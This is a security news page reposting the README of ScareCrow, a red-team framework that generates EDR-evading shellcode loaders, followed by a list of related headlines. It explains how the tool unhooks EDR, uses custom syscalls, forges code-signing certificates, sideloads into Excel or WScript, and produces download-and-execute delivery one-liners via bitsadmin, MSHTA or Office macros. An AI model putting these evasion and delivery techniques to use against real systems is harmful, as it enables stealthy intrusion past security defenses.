Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ ScareCrow - Payload Creation Framework Designed Around EDR Bypass

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š ScareCrow - Payload Creation Framework Designed Around EDR Bypass


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


If you want to learn more about the techniques utlized in this framework please take a look at Part 1 and Part 2


Description

ScareCrow is a payload creation framework for generating loaders for the use of side loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, utilizing a technique to flush an EDRโ€™s hook out the system DLLs running in the process's memory. This works because we know the EDRโ€™s hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a processโ€™ memory permissions to a different value, specifically from Executeโ€“Read to Read-Write-Execute.

When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in C:\Windows\System32\. These DLLs are stored on disk โ€œcleanโ€ of EDR hooks because they are used by the system to load an unaltered copy into a new process when itโ€™s spawned. Since EDRโ€™s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each functionโ€™s offset. Each function has an offset which denotes the exact number of bytes from the base address where they res ide, providing the functionโ€™s location on the stack. In order to do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges.

Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid being detected by non-userland hooked-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid being detected an any EDRโ€™s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions.

ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption and initialisation vector key. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLmain function which all DLLs typically need to operate. The DLL will still execute without an issue because the process we load into will look for those export functions and not worry about DLLMain being there.


Binary Sample



After


ย ย 

During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things:

  • Code signs the Loader: Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products donโ€™t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist) ScareCrow creates these certificates by using a go package version of the tool limelighter to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option.
  • Spoof the attributes of the loader: This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen this file name will map to the associated attributes for that file name, ensuring that the right values are assigned.

File Attribute Sample


ย 

With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed.


Install

The first step as always is to clone the repo. Before you compile ScareCrow you'll need to install the dependencies.

To install them, run following commands:

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo

Make sure that the following are installed on your OS:

openssl
osslsigncode
mingw-w64

Then build it

go build ScareCrow.go

Help

./ScareCrow -h

_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
โ€œFear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.โ€

Usage of ./ScareCrow:
-I string
Path to the raw 64-bit shellcode.
-Loader string
Sets the type of process that will sideload the malicious payload:
[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32.
[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process.
[*] wscript - Loads into WScript process.
(default "dll")
-O string
Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
-console
Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
-delivery string
Generates a one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader.
[*] hta - Generates a blank hta file co ntaining the loader along with a MSHTA command to execute the loader remotely in the background.
[*] macro - Generates an Office macro that will download and execute the loader remotely.
-domain string
The domain name to use for creating a fake code signing cert. (e.g. Acme.com)
-password string
The password for code signing cert. Required when -valid is used.
-sandbox string
Enables sandbox evasion using IsDomainedJoined calls.
-url string
URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
-valid string
The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired.

Loader

The Loader determines the type of technique to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory:

  • Control Panel โ€“ This generates a control panel applet (I.E Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory.
  • WScript โ€“ Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to the side-by-side load (not injected) DLL loader into its own process. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load.
  • Excel โ€“ Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded.

ScareCrow also can generate binary based payloads if needed by using the -loader command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation.


Console

ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keeps the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspiciousness and an indicator of maliciousness. ScareCrow does this by calling the โ€˜GetConsoleWindowโ€™ and โ€˜ShowWindowโ€™ Windows function after the process is created and the EDRโ€™s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional -ldflags -H=windowsgui as this is highly signatured and classified in most security products as an Indicator of Compromise.

If the -console command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing.


Delivery

The deliver command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victimโ€™s host. These delivery methods include:

  • Bits โ€“ This will generate a bitsadmin command that while download the loader remotely, execute it and remove it.
  • HTA โ€“ This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely.
  • Macro โ€“ This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed.

To Do
  • Currently only supports x64 payloads
  • Some older versions of Window's OS (i.e Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a verison check is built in to ensure stability

Credit
  • Special thanks to the artist, Luciano Buonamici for the artwork
  • Special thanks to josephspurrier for his repo


...



๐Ÿ“Œ Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 Access Bypass


๐Ÿ“ˆ 48.97 Punkte

๐Ÿ“Œ Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 Access Bypass


๐Ÿ“ˆ 48.97 Punkte

๐Ÿ“Œ [webapps] - Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management


๐Ÿ“ˆ 42.76 Punkte

๐Ÿ“Œ [webapps] - Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management


๐Ÿ“ˆ 42.76 Punkte

๐Ÿ“Œ Moxa EDR-810/EDR-G902/EDR-G903 Remote Privilege Escalation [CVE-2020-28144]


๐Ÿ“ˆ 42.76 Punkte

๐Ÿ“Œ CVE-2023-4452 | Moxa EDR-810/EDR G902/EDR G903 URI Validator buffer overflow


๐Ÿ“ˆ 42.76 Punkte

๐Ÿ“Œ ScareCrow profile.cgi user cross site scripting


๐Ÿ“ˆ 31.68 Punkte

๐Ÿ“Œ ScareCrow post.cgi forum cross site scripting


๐Ÿ“ˆ 31.68 Punkte

๐Ÿ“Œ Users Warned of New Aerst, ScareCrow, and Vohuk Ransomware Families


๐Ÿ“ˆ 31.68 Punkte

๐Ÿ“Œ Adobe Flash SimpleButton Creation Type Creation


๐Ÿ“ˆ 24.53 Punkte

๐Ÿ“Œ Adobe Flash SimpleButton Creation Type Creation


๐Ÿ“ˆ 24.53 Punkte

๐Ÿ“Œ Dump file creation failed due to error during dump creation


๐Ÿ“ˆ 24.53 Punkte

๐Ÿ“Œ Facial Recognition Designed To Detect Around Face Masks Is Failing, Study Finds


๐Ÿ“ˆ 23.39 Punkte

๐Ÿ“Œ AI is Supercharging the Creation of Maps Around the World


๐Ÿ“ˆ 22.9 Punkte

๐Ÿ“Œ CVE-2022-43484 | TERASOLUNA Global Framework/Server Framework Spring Framework input validation


๐Ÿ“ˆ 21.43 Punkte

๐Ÿ“Œ Swarmshop โ€“ What goes around comes around: hackers leak other hackersโ€™ data online


๐Ÿ“ˆ 21.27 Punkte

๐Ÿ“Œ Around the World (Around the World)


๐Ÿ“ˆ 21.27 Punkte

๐Ÿ“Œ Best ofโ€ฆ: Best of 2023: Around the World (Around the World)


๐Ÿ“ˆ 21.27 Punkte

๐Ÿ“Œ Dirty Vanity: A New Approach to Code Injection & EDR Bypass


๐Ÿ“ˆ 20.47 Punkte

๐Ÿ“Œ Dangerous Apache ActiveMQ Exploit Allows Stealthy EDR Bypass


๐Ÿ“ˆ 20.47 Punkte

๐Ÿ“Œ Blackbyte Ransomware Bypass EDR Security Using Drive Vulnerability


๐Ÿ“ˆ 20.47 Punkte

๐Ÿ“Œ Russian Hackers Bypass EDR to Deliver a Weaponized TeamViewer Component


๐Ÿ“ˆ 20.47 Punkte

๐Ÿ“Œ Pacu - The AWS Exploitation Framework, Designed For Testing The Security Of Amazon Web Services Environments


๐Ÿ“ˆ 19.9 Punkte

๐Ÿ“Œ Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals


๐Ÿ“ˆ 19.9 Punkte

๐Ÿ“Œ SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


๐Ÿ“ˆ 19.9 Punkte

๐Ÿ“Œ Crawlector - Threat Hunting Framework Designed For Scanning Websites For Malicious Objects


๐Ÿ“ˆ 19.9 Punkte

๐Ÿ“Œ RedGhost - Linux Post Exploitation Framework Designed To Gain Persistence And Reconnaissance And Leave No Trace


๐Ÿ“ˆ 19.9 Punkte

๐Ÿ“Œ RedGhost v2.0 - Linux Post Exploitation Framework Designed To Assist Red Teams In Gaining Persistence, Reconnaissance And Leaving No Trace


๐Ÿ“ˆ 19.9 Punkte

๐Ÿ“Œ Nullscan - A Modular Framework Designed To Chain And Automate Security Tests


๐Ÿ“ˆ 19.9 Punkte











matomo